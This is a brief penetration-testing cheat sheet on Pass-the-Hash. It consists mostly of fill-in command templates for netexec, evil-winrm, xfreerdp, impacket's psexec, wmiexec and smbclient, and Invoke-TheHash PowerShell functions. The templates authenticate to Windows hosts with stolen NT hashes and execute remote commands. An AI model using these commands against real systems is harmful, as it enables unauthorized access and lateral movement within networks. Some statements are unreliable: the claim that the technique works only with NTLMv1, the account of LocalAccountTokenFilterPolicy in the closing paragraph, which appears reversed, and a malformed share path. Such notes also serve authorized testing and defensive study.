Pass The Hash

Only with NTLMv1.

It consists of passing hashes as passwords to log in, which is useful when password cracking has failed. It can be done on an Active Directory domain or on local accounts without passing the domain.

Tools

Details

netexec

nxc smb <IP> -d . -u <USER> -H <HASH> -x <COMMAND> nxc smb <IP> --local-auth -u <USER> -H <HASH> -x <COMMAND>

evil-winrm

evil-winrm -i <IP> -u <USER>[@<DOMAIN>] -H <HASH>

xfreerdp

xfreerdp /v:<IP> /u:<USER> /pth:<HASH> /dynamic-resolution

impacket-smbclient

smbclient //<IP>//<SHARE> -U <USER> --pw-nt-hash <HASH>

impacket-psexec

psexec -hashes <[LMHash]:NTHash> <USER>@<IP>

impacket-wmiexec

wmiexec -hashes <[LMHash]:NTHash> <USER>@<IP>

Others impacket-scripts such as atexec, smbexec.

Invoke-TheHash

Invoke-SMBExec -Target <IP> [-Domain <DOMAIN>] -Username <USER> -Hash <HASH> -Command "<CMD>"

Invoke-WMIExec -Target <IP> [-Domain <DOMAIN>] -Username <USER> -Hash <HASH> -Command "<CMD>"

Invoke-SMBClient -Username <USER> -Hash <HASH> -Source \\server\share [-Action Get|Delete]

The user and hash we use for authentication must have administrative rights on the target computer, but if LocalAccountTokenFilterPolicy is set then only RID-500, “Administrator,” can perform remote administration tasks, if FilterAdministratorToken is also set neither can he. These settings are only for local administrative accounts.

Last updated 3 months ago